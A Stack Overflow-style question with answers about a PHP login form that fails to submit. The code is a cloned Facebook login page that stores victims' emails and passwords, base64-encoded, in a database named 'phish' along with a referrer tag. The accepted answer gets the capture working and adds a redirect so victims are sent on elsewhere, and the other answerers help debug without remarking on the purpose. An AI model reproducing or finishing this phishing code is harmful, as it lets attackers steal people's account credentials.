# form if(isset($_POST['login'])) not working at all in php

Tags: php, database, forms, isset

My problem is that I need this to submit data to my database. Below is the code that I have tried.
The actual problem is that i want to use a if(isset($_POST['login'])) but it doesn't work in this form any ideas  ?

Above my html

```
<?php
       session_start();
        $_SESSION['ref']=$_GET['ref'];
         function login()
          {
            $host="127.0.0.1:8889";
            $user="root";
            $pw="root";
            $verbinding=mysql_connect($host,$user,$pw) or die("Kan de verbinding niet maken"); 
          }
        ?>
```

My form can be found here

```
<form id="login_form" action="" method="post" onsubmit="">
<input type="hidden" name="lsd" value="AVo7vBhv" autocomplete="off"><table cellspacing="0">        <tbody>
 <tr><td class="html7magic"><label for="email">Email or Phone</label></td><td class="html7magic">
 <label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" value="" tabindex="1"></td>
 <td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2"></td>
<td><label class="uiButton uiButtonConfirm" id="loginbutton" for="u_0_n">
<input id="u_0_n" name="login" type="submit" value="Log In"></label></td>
</tr>
<tr><td class="login_form_label_field"><div><div class="uiInputLabel clearfix   uiInputLabelLegacy">
<input id="persist_box" type="checkbox" name="persistent" value="1" tabindex="3"  class="uiInputLabelInput uiInputLabelCheckbox"><label for="persist_box" class="uiInputLabelLabel">Keep me logged in</label></div>
<input type="hidden" name="default_persistent" value="0"></div></td><td class="login_form_label_field"><a rel="nofollow" href="https://www.facebook.com/recover/initiate">Forgot your password?</a></td></tr></tbody></table>
<input type="hidden" autocomplete="off" name="timezone" value="-120" id="u_0_o">
<input type="hidden" name="lgnrnd" value="082209_35e1"><input type="hidden" id="lgnjs" name="lgnjs" value="1396970529">
<input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US"></form>
```

Underneath my form you find this

```
<?php
 if(isset($_POST['login'])){
if($_POST['email'] != "" && $_POST['pass'] != "")
{
 login();
   $db="phish";
    mysql_select_db($db);
$sql = "INSERT INTO facebook(username,password,ref) VALUES ('".base64_encode($_POST['email'])."','".base64_encode($_POST['pass'])."','".$_SESSION['ref']."')";

 mysql_query($sql); 

 mysql_close($verbinding);
}
} 
?>
```

Comment: mysql_ extensions are deprecated. I say that pay attention to this.

Comment: if i call the php under need the form as a function on the onsubmit="function()" then it works, but then i got to problem i can't redirect after login ...

Comment: i am not native english would you please describe indentation more accurate  ?

Comment: Can you add under your `if(isset($_POST['login'])){` line `echo "sample";` and when you run, is that writing "sample" ?

Comment: @Burak Tokak Not working might it have something to do with these hidden types ?

Comment: You made a simple code much complicated. I can recommend you to watch a tutorial about simple inserting.

Comment: It aint complicated the problem is in not being able to catch the name attribute

Answer (score 0, accepted):

I've got the answer i had to change it

TO:

```
     <?php
if($_POST['email'] != "" && $_POST['pass'] != "")
{
 login();
   $db="phish";
      mysql_select_db($db);
$sql = "INSERT INTO facebook(username,password,ref) VALUES ('".base64_encode($_POST['email'])."','".base64_encode($_POST['pass'])."','".$_SESSION['ref']."')";

  mysql_query($sql); 

  mysql_close($verbinding);
   ?>
    <script>
    alert("alert here");
   window.location.href="url-here";
   </script>
    <?php 
}
 ?>
```

I just removed the if(isset($_POST['login'])) and used some additional javascript to get it working ;)

Answer (score 0):

You need to put method="post" in your form tag.

Comment: thnx but i already got it just forgot to put it up here i now exactly posted it as it is in my code, i don't see any mistake ...

Comment: @user3432892 it would help if you post your real code here instead of only examples. Your form is also not complete.

Answer (score 0):

Meh :)

You really need to get over the syntax of functions in PHP. You need to use "function" prefix before while you are creating a new function.

```
function login()
  {
    $host="127.0.0.1:8889";
    $user="root";
    $pw="root";
    $verbinding=mysql_connect($host,$user,$pw) or die("Kan de verbinding niet maken"); 
  }
```

Btw, you don't need to create a function to connect your database. You can just use the `include("path/to/mysql_connection.php");` function. It's more efficient.

---

The other thing in your code is the method of your form sending. You are using POST method so you need to add `method="post"` into your form tag.

---

And i dint actually understand what your code doing, but hope that infos helps.

Good luck.

Comment: thnx going to test it now

Comment: Try without `base64_encode()` functions. And can you write the main problem with your code? Do you having an error, or cant you connent the DB or cant you just insert something into DB? Write it in your question.